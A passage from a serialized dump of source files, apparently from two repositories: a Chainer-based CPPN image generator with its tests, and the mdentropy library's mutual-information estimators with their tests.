"num_lines": 64, "path": "/experiments/show_samples_from_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport numpy\nimport argparse\nfrom pathlib import Path\nimport random\nfrom PIL import Image\nfrom cppn.mnist_dataset import MnistDataset\nfrom cppn.emnist_dataset import EMnistDataset\n\n\ndef show_samples_from_dataset(\n dataset_type: str,\n n_rows: int,\n n_cols: int,\n size: int,\n data_path: Path,\n output_path: Path):\n \n # initialize dataset\n if dataset_type == 'mnist':\n dataset = MnistDataset(width=size, height=size, z_size=1)\n elif dataset_type == 'emnist':\n dataset = EMnistDataset(width=size, height=size, z_size=1, data_path=data_path)\n else:\n raise NotImplementedError\n\n # sample images\n rows = []\n for i in range(n_rows):\n rows.append(\n numpy.concatenate([ dataset.get_example(random.randint(0, len(dataset) - 1))[2] for _ in range(n_cols)], axis=3)\n )\n img = numpy.concatenate(rows, axis=2)\n \n # float32 -> uint8\n img = (img[0, 0] * 255.0).astype(numpy.uint8)\n\n Image.fromarray(img).save(output_path)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('output_path', type=Path)\n parser.add_argument('--dataset_type', type=str, choices=('mnist', 'emnist'), default='mnist')\n parser.add_argument('--data_path', type=Path)\n parser.add_argument('--n_rows', type=int, default=5)\n parser.add_argument('--n_cols', type=int, default=5)\n parser.add_argument('--size', type=int, default=128)\n args = parser.parse_args()\n\n assert args.output_path.parent.exists()\n\n show_samples_from_dataset(\n dataset_type=args.dataset_type,\n n_rows=args.n_rows,\n n_cols=args.n_cols,\n size=args.size,\n data_path=args.data_path,\n output_path=args.output_path\n )" }, { "alpha_fraction": 0.4720812141895294, "alphanum_fraction": 0.6802030205726624, "avg_line_length": 14.760000228881836, "blob_id": "3327c00c8760840521eaac765beed7880a0d84e2", "content_id": "c78dddd1d9a17caf3f0190463d8181ccec4e1abf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 394, "license_type": "no_license", "max_line_length": 24, "num_lines": 25, "path": "/requirements.txt", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "atomicwrites==1.3.0\nattrs==19.2.0\nautoflake==1.3.1\nchainer==6.4.0\nfilelock==3.0.12\nimportlib-metadata==0.23\nisort==4.3.21\nmore-itertools==7.2.0\nnumpy==1.17.2\npackaging==19.2\nPillow==6.2.0\npluggy==0.13.0\nprotobuf==3.7.1\npy==1.8.0\npyflakes==2.1.1\npyparsing==2.4.2\npytest==5.2.1\nPyYAML==5.1.2\nscipy==1.3.1\nsix==1.12.0\ntyping==3.6.6\ntyping-extensions==3.6.6\nwcwidth==0.1.7\nyapf==0.28.0\nzipp==0.6.0\n" }, { "alpha_fraction": 0.5839464664459229, "alphanum_fraction": 0.5892976522445679, "avg_line_length": 29.510204315185547, "blob_id": "ec7ee8238640d6711457094d72896d7b6e6fd446", "content_id": "3441c7d5dd930dcde85329357fcdbd8b1d7b61c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1495, "license_type": "no_license", "max_line_length": 105, "num_lines": 49, "path": "/experiments/sample_image_from_paths.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport argparse\nimport numpy\nfrom PIL import Image\n\ndef sample_image_from_paths(target_path: Path, out_path: Path, n_cols: int, n_rows: int, size: int = 64):\n \"\"\" Plot n_rows * n_cols images from target_path \"\"\"\n imgs = []\n with open(target_path) as f:\n line = f.readline()\n while line:\n target = line.split('\\n')[0]\n target = Path(target)\n\n img = Image.open(target)\n img = img.resize((size, size))\n img = img.convert('L')\n img = numpy.asarray(img)\n\n imgs.append(img)\n\n if len(imgs) >= n_cols * n_rows: break\n line = f.readline() # next line\n \n # imgs is list of (size, size) uint8 array\n rows = []\n for i in range(n_rows):\n row = numpy.concatenate([ imgs[n_cols * i + j] for j in range(n_cols)], axis=1)\n rows.append(row)\n\n imgs = numpy.concatenate(rows, axis=0)\n Image.fromarray(imgs).save(out_path)\n \n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('target_path', type=Path)\n parser.add_argument('out_path', type=Path)\n parser.add_argument('--n_cols', type=int, default=5)\n parser.add_argument('--n_rows', type=int, default=5)\n args = parser.parse_args()\n\n\n # check arguments\n assert args.target_path.exists()\n assert args.out_path.parent.exists()\n\n sample_image_from_paths(args.target_path, args.out_path, args.n_cols, args.n_rows)\n" }, { "alpha_fraction": 0.5786193609237671, "alphanum_fraction": 0.5872483253479004, "avg_line_length": 33.196720123291016, "blob_id": "c3355774699946c065c80f55ae1a5e2b1a8931b5", "content_id": "568d0596f3514cb3ed291552f56c20b5da10b591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 118, "num_lines": 61, "path": "/cppn/model.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\nimport typing\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom cppn import config_base\n\n\[email protected]\nclass ModelConfig(config_base.ConfigBase):\n width: int\n height: int\n n_units_xyrz: int\n n_hidden_units: typing.List[int]\n z_size: int\n activation: typing.Callable = F.tanh\n\n\nclass CPPN(chainer.Chain):\n def __init__(self, config: ModelConfig):\n self.config = config\n super(CPPN, self).__init__()\n\n initialW = chainer.initializers.Normal(scale=1.0)\n\n with self.init_scope():\n self.l_x = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_y = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_r = L.Linear(1, self.config.n_units_xyrz, initialW=initialW)\n self.l_z = L.Linear(self.config.z_size, self.config.n_units_xyrz, initialW=initialW)\n\n input_size = self.config.n_units_xyrz\n for i, n_hidden_unit in enumerate(self.config.n_hidden_units):\n setattr(self, f\"l_hidden_{i}\", L.Linear(input_size, n_hidden_unit, initialW=initialW))\n input_size = n_hidden_unit\n self.l_out = L.Linear(self.config.n_hidden_units[-1], 1, initialW=initialW)\n\n def forward(self, x, z):\n assert x.shape[0] % (self.config.width *\n self.config.height) == 0, f\"Invalid input size x.shape[0] % (width * height) != 0\"\n\n batch_size = x.shape[0] // (self.config.width * self.config.height)\n\n f = self.config.activation\n _x, _y, _r = F.split_axis(x, 3, axis=1)\n h = self.l_x(_x)\n h += self.l_y(_y)\n h += self.l_r(_r)\n h += self.l_z(z)\n h = F.softplus(h)\n\n for i in range(len(self.config.n_hidden_units)):\n h = f(getattr(self, f\"l_hidden_{i}\")(h))\n\n h = F.sigmoid(self.l_out(h))\n h = F.concat(\n [_h.reshape((1, 1, self.config.width, self.config.height)) for _h in F.split_axis(h, batch_size, axis=0)],\n axis=0)\n return h\n" }, { "alpha_fraction": 0.5441714525222778, "alphanum_fraction": 0.565342366695404, "avg_line_length": 33.16071319580078, "blob_id": "13e3bd24ff778be92b835509d4a15fcc73995c66", "content_id": "13bc1a82b223262c8884bc508448a1d4b642990b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3826, "license_type": "no_license", "max_line_length": 111, "num_lines": 112, "path": "/test/test_backward.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport chainer.functions as F\nimport numpy\n\nfrom cppn.conditional_model import ConditionalCPPN, ConditionalModelConfig\nfrom cppn.input_data import InputData\nfrom cppn.model import CPPN, ModelConfig\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef get_dammy_output(batch, width, height):\n x = numpy.random.rand(batch, 1, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef gen_input_batch(batch_size, width, height, z_size):\n # create inputs\n inputs = {}\n x, z = [], []\n for idx in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n _x = chainer.Variable(_x)\n _z = chainer.Variable(_z)\n x.append(_x)\n z.append(_z)\n inputs[idx] = (_x, _z)\n x = F.concat(x, axis=0)\n z = F.concat(z, axis=0)\n return x, z, inputs\n\n\ndef test_unconditional_forward():\n \"\"\" checking gradient leaking along batch axis \"\"\"\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = CPPN(ModelConfig(width=width, height=height, n_units_xyrz=3, n_hidden_units=[5, 5], z_size=z_size))\n model.zerograds()\n\n # create inputs: inputs is dict whose key is batch index, and value is tuple of (x, z) for each index\n x, z, inputs = gen_input_batch(batch_size, width, height, z_size)\n\n # forward prop\n y = model.forward(x, z)\n\n # taking loss at only first image\n t = get_dammy_output(batch_size, width, height)\n loss = F.mean_squared_error(y[0], t[0])\n\n # check gradient leaking\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[0])]) != 0.0\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[1])]) == 0.0\n assert sum([g.data.sum() for g in chainer.grad((loss, ), inputs[2])]) == 0.0\n\n\ndef test_conditional_backward():\n \"\"\" checking gradient leaking along batch axis \"\"\"\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = ConditionalCPPN(\n ConditionalModelConfig(width=width,\n height=height,\n n_units_xyr=3,\n n_hidden_units=[\n 10,\n 10,\n ],\n z_size=z_size,\n in_width=64,\n in_height=64,\n in_channel=1,\n use_batch_norm=False))\n model.zerograds()\n\n # create inputs: inputs is dict whose key is batch index, and value is tuple of (x, z) for each index\n x, z, inputs = gen_input_batch(batch_size, width, height, z_size)\n c = chainer.Variable(get_dammy_input(batch_size, 64, 64, 1)) # init dammy conditional input\n\n # forward prop\n y = model.forward(x, z, c)\n\n # taking loss at only first image\n t = get_dammy_output(batch_size, width, height)\n loss = F.mean_squared_error(y[0], t[0])\n\n g_x, g_z = chainer.grad((loss, ), inputs[0])\n g_c = chainer.grad((loss, ), (c, ))[0].data\n\n assert g_c[0].sum() != 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() != 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() != 0.0, f\"gradient of z is zero\"\n\n g_x, g_z = chainer.grad((loss, ), inputs[1])\n assert g_c[1].sum() == 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() == 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() == 0.0, f\"gradient of z is zero\"\n\n g_x, g_z = chainer.grad((loss, ), inputs[2])\n assert g_c[2].sum() == 0.0, f\"gradient of c is zero\"\n assert g_x.data.sum() == 0.0, f\"gradient of x is zero\"\n assert g_z.data.sum() == 0.0, f\"gradient of z is zero\"\n" }, { "alpha_fraction": 0.5718799233436584, "alphanum_fraction": 0.5831640958786011, "avg_line_length": 36.235294342041016, "blob_id": "2ddedfae78d8bc80e19f45f34668ca15dd5baa8c", "content_id": "512c5c8a828d5cdd5b9edac0cf3d8a2b62104113", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4431, "license_type": "no_license", "max_line_length": 120, "num_lines": 119, "path": "/cppn/conditional_model.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\nimport typing\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom cppn import config_base\n\n\[email protected]\nclass ConditionalModelConfig(config_base.ConfigBase):\n width: int\n height: int\n n_units_xyr: int\n n_hidden_units: typing.List[int]\n z_size: int\n in_width: int = 64 # width of conditional input\n in_height: int = 64 # height of conditional input\n in_channel: int = 1 # channel of conditional input\n activation: typing.Callable = F.tanh\n use_batch_norm: bool = True # using batch normalization layer or not\n\n\nclass Block(chainer.Chain):\n def __init__(self, in_channel, out_channel, ksize, activation, use_batch_norm):\n self.activation = activation\n self.use_batch_norm = use_batch_norm\n super(Block, self).__init__()\n with self.init_scope():\n self.conv = L.Convolution2D(in_channel, out_channel, ksize=ksize, stride=2)\n if use_batch_norm:\n self.norm = L.BatchNormalization(out_channel)\n\n def __call__(self, x):\n h = self.conv(x)\n if self.use_batch_norm: h = self.norm(h)\n return self.activation(h)\n\n\nclass ConditionInputProcessor(chainer.Chain):\n \"\"\" Conditional input processing part of CPPN model \"\"\"\n def __init__(self, width, height, channel, activation, use_batch_norm):\n self.width = width\n self.height = height\n self.channel = channel\n super(ConditionInputProcessor, self).__init__()\n\n with self.init_scope():\n in_channel = channel\n for i, out_channel, ksize in zip(range(3), (12, 32, 64, 64), (6, 3, 3, 2)):\n setattr(self, f\"block_{i}\",\n Block(in_channel, out_channel, ksize, activation, use_batch_norm=use_batch_norm))\n in_channel = out_channel\n\n def __call__(self, x):\n batch_size = x.shape[0]\n h = x\n for i in range(3):\n block = getattr(self, f\"block_{i}\")\n h = block(h)\n h = F.average_pooling_2d(h, ksize=4, stride=2)\n return F.reshape(h, (batch_size, -1)) # reshape into vector\n\n\nclass ConditionalCPPN(chainer.Chain):\n \"\"\" conditional generator of CPPN \"\"\"\n def __init__(self, config: ConditionalModelConfig):\n self.config = config\n super(ConditionalCPPN, self).__init__()\n\n initialW = chainer.initializers.Normal(scale=1.0)\n\n with self.init_scope():\n self.l_x = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_y = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_r = L.Linear(1, self.config.n_units_xyr, initialW=initialW)\n self.l_z = L.Linear(self.config.z_size, self.config.n_units_xyr, initialW=initialW)\n self.l_c = ConditionInputProcessor(self.config.in_width, self.config.in_height, self.config.in_channel,\n self.config.activation, self.config.use_batch_norm)\n\n for i, n_hidden_unit in enumerate(self.config.n_hidden_units):\n setattr(self, f\"l_hidden_{i}\", L.Linear(None, n_hidden_unit, initialW=initialW))\n self.l_out = L.Linear(None, 1, initialW=initialW)\n\n def forward(self, x, z, c):\n assert x.shape[0] % (self.config.width *\n self.config.height) == 0, f\"Invalid input size x.shape[0] % (width * height) != 0\"\n\n batch_size = x.shape[0] // (self.config.width * self.config.height)\n\n # processing conditional input\n h_c = self.l_c(c) # [B, 256]\n h_c = [\n F.repeat(_h, self.config.width * self.config.height, axis=0) for _h in F.split_axis(h_c, batch_size, axis=0)\n ]\n h_c = F.concat(h_c, axis=0)\n\n # process input\n f = self.config.activation\n _x, _y, _r = F.split_axis(x, 3, axis=1)\n h_in = self.l_x(_x)\n h_in += self.l_y(_y)\n h_in += self.l_r(_r)\n h_in += self.l_z(z)\n h_in = f(h_in)\n\n # concat with conditional feature\n h = F.concat((h_in, h_c), axis=1)\n\n for i in range(len(self.config.n_hidden_units)):\n h = f(getattr(self, f\"l_hidden_{i}\")(h))\n\n h = F.sigmoid(self.l_out(h))\n\n h = F.concat(\n [_h.reshape((1, 1, self.config.width, self.config.height)) for _h in F.split_axis(h, batch_size, axis=0)],\n axis=0)\n return h\n" }, { "alpha_fraction": 0.49644550681114197, "alphanum_fraction": 0.5165876746177673, "avg_line_length": 45.88888931274414, "blob_id": "003619cbbecd28325992a3432ab14a953ff75c00", "content_id": "933062de3e564d793b18db80c4854f92801b7567", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 117, "num_lines": 18, "path": "/test/test_train.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import tempfile\nfrom pathlib import Path\n\nfrom cppn.model import ModelConfig\nfrom experiments import train\n\n\ndef test_train():\n with tempfile.TemporaryDirectory() as tmp_dir:\n train_config = train.TrainConfig(train_image_dir_path=(Path(__file__).parent / 'dammy_image_data').resolve(),\n max_iter=2,\n batch_size=5,\n snapshot_iter_interval=2,\n display_iter_interval=1,\n n_discriminator_update=3,\n evaluation_iter_interval=1)\n model_config = ModelConfig(width=64, height=64, n_units_xyrz=10, n_hidden_units=[10, 10], z_size=2)\n train.train(Path(tmp_dir), train_config, model_config)\n" }, { "alpha_fraction": 0.5421398878097534, "alphanum_fraction": 0.589958131313324, "avg_line_length": 41.89743423461914, "blob_id": "1f222578e450e98ce0b52e78d4e647c1379d8ec6", "content_id": "a005fe3f0edc730249eaa3c2045fbdeb7d4795ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 80, "num_lines": 39, "path": "/cppn/sn_discriminator.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import chainer gan lib\nimport sys # isort:skip\nfrom pathlib import Path # isort:skip\nCHAINER_GAN_LIB = Path(__file__).parent.parent / 'chainer-gan-lib' # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB)) # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB / 'sn')) # isort:skip\nsys.path.append(str(CHAINER_GAN_LIB / 'common')) # isort:skip\n\nimport chainer\nimport chainer.functions as F\n\nfrom sn.sn_convolution_2d import SNConvolution2D\nfrom sn.sn_linear import SNLinear\n\n\nclass SNDiscriminator(chainer.Chain):\n def __init__(self, wscale=0.02, ch=24):\n w = chainer.initializers.Normal(wscale)\n super(SNDiscriminator, self).__init__()\n with self.init_scope():\n # in_channels, out_channels, ksize, stride, pad\n self.c0_0 = SNConvolution2D(1, ch // 8, 3, 1, 1, initialW=w)\n self.c0_1 = SNConvolution2D(ch // 8, ch // 4, 4, 2, 1, initialW=w)\n self.c1_0 = SNConvolution2D(ch // 4, ch // 4, 3, 1, 1, initialW=w)\n self.c1_1 = SNConvolution2D(ch // 4, ch // 2, 4, 2, 1, initialW=w)\n self.c2_0 = SNConvolution2D(ch // 2, ch // 2, 3, 1, 1, initialW=w)\n self.c2_1 = SNConvolution2D(ch // 2, ch // 1, 4, 2, 1, initialW=w)\n self.c3_0 = SNConvolution2D(ch // 1, ch // 1, 3, 1, 1, initialW=w)\n self.l_4 = SNLinear(None, 1, initialW=w)\n\n def forward(self, x):\n h = F.leaky_relu(self.c0_0(x))\n h = F.leaky_relu(self.c0_1(h))\n h = F.leaky_relu(self.c1_0(h))\n h = F.leaky_relu(self.c1_1(h))\n h = F.leaky_relu(self.c2_0(h))\n h = F.leaky_relu(self.c2_1(h))\n h = F.leaky_relu(self.c3_0(h))\n return self.l_4(h)\n" }, { "alpha_fraction": 0.5518292784690857, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 27.941177368164062, "blob_id": "440ad4c1297e3711b469ad0f2effd0535c6c0b56", "content_id": "9c9e73f818c523556d8be875c80c935451dd4faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 78, "num_lines": 34, "path": "/cppn/my_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport chainer\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData\n\n\nclass MyDataset(chainer.dataset.DatasetMixin):\n def __init__(self, paths: list, width: int, height: int, z_size: int):\n self.paths = paths\n self.width = width\n self.height = height\n self.z_size = z_size\n self.input_data = InputData(self.width, self.height, self.z_size)\n super(MyDataset, self).__init__()\n\n def __len__(self):\n return len(self.paths)\n\n def get_example(self, i):\n \"\"\" returns x, z, c \"\"\"\n # get\n x, z = self.input_data.as_batch()\n\n # open image and convert to [1, 1, W, H]\n c = Image.open(Path(self.paths[i]))\n c = c.resize((self.width, self.height))\n\n c = c.convert('L')\n c = numpy.asarray(c, dtype=numpy.float32) / 255. # [0, 255] -> [0, 1]\n c = c.reshape((1, 1, self.width, self.height)) # [1, 1, W, H]\n\n return x, z, c\n" }, { "alpha_fraction": 0.6076233386993408, "alphanum_fraction": 0.6278026700019836, "avg_line_length": 25.235294342041016, "blob_id": "0af30a97ca35b287a96b85775e183c5e2678baf8", "content_id": "64845dc6aa9b67373f495eaafd0aaa8efb2ebc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/test/test_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom cppn.my_dataset import MyDataset\n\n\ndef test_get_example():\n width = 32\n height = 32\n z_size = 2\n paths = list(Path('./test/dammy_image_data').glob('*.jpg'))\n dataset = MyDataset(paths, width=width, height=height, z_size=z_size)\n\n x, z, c = dataset.get_example(0)\n\n assert x.shape == (width * height, 3)\n assert z.shape == (width * height, z_size)\n assert c.shape == (1, 1, width, height)\n" } ]
25
shozebhaider/mdentropy
https://github.com/shozebhaider/mdentropy
0e412efd1bf20d37dd8f64674f9170760f27a621
82d616ddffe11283052b2d870c3b0274736a173c
c20e0ed944f536626329fb4a1a25599e4d8bd6da
refs/heads/master
2020-05-25T17:09:28.122059
2018-01-17T06:12:18
2018-01-17T06:12:18
187,903,560
1
0
null
2019-05-21T19:48:48
2019-05-21T19:47:39
2018-01-17T06:12:18
null
[ { "alpha_fraction": 0.5543050169944763, "alphanum_fraction": 0.5603076219558716, "avg_line_length": 28.131147384643555, "blob_id": "bdf4e8d8bf290de59a0c6eb79231afbca8df9a6b", "content_id": "8544f630348ec147ad6dc96d5fb25ef117c494b5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5331, "license_type": "permissive", "max_line_length": 78, "num_lines": 183, "path": "/mdentropy/core/information.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .entropy import entropy, centropy\nfrom ..utils import avgdigamma, nearest_distances\n\nfrom numpy import (atleast_2d, diff, finfo, float32, hstack, nan_to_num, sqrt)\n\nfrom scipy.special import psi\n\n__all__ = ['mutinf', 'nmutinf', 'cmutinf', 'ncmutinf']\nEPS = finfo(float32).eps\n\n\ndef mutinf(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n if method == 'knn':\n return knn_mutinf(x, y, k=n_bins,\n boxsize=diff(rng).max() if rng else None)\n\n return (entropy(n_bins, [rng], method, x) +\n entropy(n_bins, [rng], method, y) -\n entropy(n_bins, 2 * [rng], method, x, y))\n\n\ndef knn_mutinf(x, y, k=None, boxsize=None):\n \"\"\"k-NN mutual information calculation\n\n Parameters\n ----------\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n k : int\n Number of bins.\n boxsize : float (or None)\n Wrap space between [0., boxsize)\n\n Returns\n -------\n mi : float\n \"\"\"\n data = hstack((x, y))\n\n k = k if k else max(3, int(data.shape[0] * 0.01))\n\n # Find nearest neighbors in joint space, p=inf means max-norm\n dvec = nearest_distances(data, k=k)\n a, b, c, d = (avgdigamma(atleast_2d(x).reshape(data.shape[0], -1), dvec),\n avgdigamma(atleast_2d(y).reshape(data.shape[0], -1), dvec),\n psi(k), psi(data.shape[0]))\n return max((-a - b + c + d), 0.)\n\n\ndef nmutinf(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Normalized mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n return nan_to_num(mutinf(n_bins, x, y, method=method, rng=rng) /\n sqrt(entropy(n_bins, [rng], method, x) *\n entropy(n_bins, [rng], method, y)))\n\n\ndef cmutinf(n_bins, x, y, z, rng=None, method='knn'):\n \"\"\"Conditional mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n if method == 'knn':\n return knn_cmutinf(x, y, z, k=n_bins,\n boxsize=diff(rng).max() if rng else None)\n\n return (centropy(n_bins, x, z, rng=rng, method=method) +\n entropy(n_bins, 2 * [rng], method, y, z) -\n entropy(n_bins, 3 * [rng], method, x, y, z))\n\n\ndef knn_cmutinf(x, y, z, k=None, boxsize=None):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n x : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n k : int\n Number of bins.\n boxsize : float (or None)\n Wrap space between [0., boxsize)\n\n Returns\n -------\n cmi : float\n \"\"\"\n data = hstack((x, y, z))\n\n k = k if k else max(3, int(data.shape[0] * 0.01))\n\n # Find nearest neighbors in joint space, p=inf means max-norm\n dvec = nearest_distances(data, k=k)\n a, b, c, d = (avgdigamma(hstack((x, z)), dvec),\n avgdigamma(hstack((y, z)), dvec),\n avgdigamma(atleast_2d(z).reshape(data.shape[0], -1), dvec),\n psi(k))\n return max((-a - b + c + d), 0.)\n\n\ndef ncmutinf(n_bins, x, y, z, rng=None, method='knn'):\n \"\"\"Normalized conditional mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n ncmi : float\n \"\"\"\n return (cmutinf(n_bins, x, y, z, rng=rng, method=method) /\n centropy(n_bins, x, z, rng=rng, method=method))\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7176470756530762, "avg_line_length": 20.25, "blob_id": "fde38072bccee7525a7002adaee278f44fbb0b75", "content_id": "515cd5d9063cd1fb70c66c583eb858e2afb03314", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "permissive", "max_line_length": 40, "num_lines": 4, "path": "/mdentropy/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .core import *\n\nfrom .version import version as _version\n__version__ = _version\n" }, { "alpha_fraction": 0.5973813533782959, "alphanum_fraction": 0.6288870573043823, "avg_line_length": 22.056604385375977, "blob_id": "b9afc47348cc1cef33a9c5f73be55e1301af89c7", "content_id": "522fda0e409a2427484c965ae00e84e72bf9f391", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2444, "license_type": "permissive", "max_line_length": 77, "num_lines": 106, "path": "/mdentropy/tests/test_mutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import entropy_gaussian\nfrom ..core import mutinf, nmutinf\nfrom ..metrics import (AlphaAngleMutualInformation, ContactMutualInformation,\n DihedralMutualInformation)\n\nfrom msmbuilder.example_datasets import FsPeptide\n\nimport numpy as np\nfrom numpy.testing import assert_almost_equal as eq, assert_allclose as close\n\n\nrs = np.random.RandomState(42)\nn = 50000\nP = np.array([[1, 0], [0.5, 1]])\nCOV = np.dot(P, P.T)\nU = rs.randn(2, n)\nX, Y = np.dot(P, U)\nX, Y = X.reshape(n, 1), Y.reshape(n, 1)\n\nTRUE_MUTINF = (entropy_gaussian(COV[0, 0]) + entropy_gaussian(COV[1, 1]) -\n entropy_gaussian(COV))\n\n\ndef test_mutinf_kde():\n close(mutinf(8, X, Y, method='kde'), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_knn():\n close(mutinf(3, X, Y, method='knn'), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_chaowangjost():\n close(mutinf(8, X, Y, method='chaowangjost'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_grassberger():\n close(mutinf(8, X, Y, method='grassberger'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_doanes_rule():\n close(mutinf(None, X, Y, method='grassberger'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_naive():\n close(mutinf(8, X, Y, method=None), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_reversible():\n MI1 = mutinf(24, X, Y)\n MI2 = mutinf(24, Y, X)\n\n eq(MI1, MI2, 5)\n\n\ndef test_nmutinf_reversible():\n MI1 = nmutinf(24, X, Y)\n MI2 = nmutinf(24, Y, X)\n\n eq(MI1, MI2, 5)\n\n\ndef test_fs_mutinf():\n\n traj = FsPeptide().get().trajectories[0]\n\n idx = [at.index for at in traj.topology.atoms\n if at.residue.index in [3, 4, 5, 6, 7, 8]]\n traj = traj.atom_slice(atom_indices=idx)[::100]\n\n yield _test_mi_alpha, traj\n yield _test_mi_contact, traj\n yield _test_mi_dihedral, traj\n\n\ndef _test_mi_alpha(traj):\n mi = AlphaAngleMutualInformation()\n M = mi.partial_transform(traj)\n\n eq(M - M.T, 0)\n\n\ndef _test_mi_contact(traj):\n mi = ContactMutualInformation()\n M = mi.partial_transform(traj)\n\n eq(M - M.T, 0)\n\n\ndef _test_mi_dihedral(traj):\n mi = DihedralMutualInformation()\n M = mi.partial_transform(traj)\n\n 